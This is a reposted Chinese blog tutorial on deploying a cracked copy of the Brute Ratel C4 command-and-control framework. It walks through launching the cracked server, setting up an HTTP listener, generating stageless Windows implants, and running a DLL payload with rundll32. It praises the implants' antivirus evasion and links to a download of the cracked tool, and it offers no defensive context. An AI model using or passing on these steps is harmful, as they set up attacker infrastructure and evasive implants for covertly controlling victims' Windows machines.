Brute Ratel C4 从入门到进编

admin 2024年7月5日14:02:53评论11 views字数 983阅读3分16秒阅读模式

在前面的文章中,我们提到过很多C2框架工具。如CS viper等。今天为大家分享另外一款好玩的工具Brute Ratel C4

部署

下载完成后,在kali中解压文件。

Brute Ratel C4 从入门到进编

安装环境和证书(可省略)

进入adhoc_scripts目录下运行,安装环境和生成证书

chmod +x install.sh
chmod +x genssl.sh
./install.sh
./genssl.sh
Brute Ratel C4 从入门到进编
安装环境
Brute Ratel C4 从入门到进编
生成证书

接下来,分别给brute-ratel-linx64_crack以及lib64/commander执行权限

chmod +x brute-ratel-linx64_crack
chmod +x lib64/commander
Brute Ratel C4 从入门到进编

接下来,启动服务端

./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem

执行完后将生成的key.pemcert.pem复制到工具的目录下

Brute Ratel C4 从入门到进编

参数说明:

  • -a 用户名
  • -p 登录密码

接下来,我们启动客户端

chmod +x Rungui.sh #给客户端添加权限
./Rungui.sh

Brute Ratel C4 从入门到进编修改你的端口和账号密码等信息。完成后点击头像登录。

Brute Ratel C4 从入门到进编

添加监听

和cs等工具一样,接下来我们新建一个监听。点击C4 Profiler -> Add http Listener

Brute Ratel C4 从入门到进编参数配置示例如下:

Brute Ratel C4 从入门到进编注意: sleepjitter类似于cs的延时时间,可调低,末尾最后一行勾选后,马子如果一次不上线,不会一直请求

生成shell

点击save保存,即可得到一个监听器,右键此监听器,选择Stageless,即可生成对应架构的马子

Brute Ratel C4 从入门到进编

但不知为何,作者生成exe文件后,在Windows11系统上得不到Shell。无奈生成了dll文件。

rundll32 kali.dll,main 

Brute Ratel C4 从入门到进编当前,免杀效果还是挺好的。

Brute Ratel C4 从入门到进编

相关操作

Brute Ratel C4 从入门到进编
命令终端
Brute Ratel C4 从入门到进编
文件浏览

当然,还有很多好玩的功能。我们会在后期的文章中为大家更新!

总结

优点: 免杀非常友好,和cs等工具相似,入手门槛低。

不足: 目前仅支持Windows Payload。希望在后面能增加其他平台的Payload。

获取工具

链接:https://pan.quark.cn/s/24fe53b0aaf4

 

原文始发于微信公众号(kali笔记):Brute Ratel C4 从入门到进编

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月5日14:02:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Brute Ratel C4 从入门到进编http://cn-sec.com/archives/2922005.html

发表评论

匿名网友 填写信息